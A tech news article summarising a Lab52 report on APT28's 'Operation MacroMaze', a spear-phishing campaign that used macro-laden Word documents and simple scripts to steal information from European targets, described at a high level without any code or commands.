- APT28 (Fancy Bear) reportedly running “Operation MacroMaze” since September 2025
- Spear phishing emails containing macro-laden Word documents used to remove information thieves
- Attack chain relies on simple scripts and HTML, maximizing stealth and persistence
APT28, the infamous Russian state-sponsored hacking group, also known as Fancy Bear, or Sofacy, has been observed targeting “specific entities” in Western and Central Europe with information stealers.
In a recently published report, security researchers Lab52 from S2 Grupo detailed “Operation MacroMaze”, which took place from at least late September 2025 to January 2026.
The campaign begins with a highly personalized spear phishing email. The topics and contents vary, but they are mainly related to diplomatic themes. In one case, researchers said they saw a lightly edited copy of official diplomatic diaries being distributed.
Word documents and macros
The emails would be accompanied by a macro-laden Microsoft Office Word document. Macros are small programs or scripts that can be created in Microsoft Word to automate repetitive tasks. However, they have been so abused over the years that Microsoft has disabled them by default, especially for files downloaded from the Internet.
However, attackers carefully crafted Word files based on this fact, tricking victims into enabling macros and executing the malicious code. Lab52 also said that the malware was designed to notify attackers when the victim actually executes the file.
When they do this, they trigger a chain reaction that, instead of removing a single infostealer malware variant, removes multiple small scripts and HTML templates.
These established persistence, reconstructed a command payload from downloaded fragments, collected basic system information, and exfiltrated the results via an auto-submitting HTML form.
“This campaign proves that simplicity can be powerful,” the researchers explained. “The attacker uses very basic tools (batch files, tiny VBS launchers, and simple HTML) but carefully organizes them to maximize stealth: moving operations to hidden or off-screen browser sessions, cleaning up artifacts, and outsourcing payload delivery and data exfiltration to widely used webhook services.”
The group behind Operation MacroMaze, APT28, has been actively involved in Russia’s “special military operation”, attacking Ukrainian infrastructure and its allies, as it wages war against Ukraine in cyberspace.
Via Hacker news
The best antivirus for every budget
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
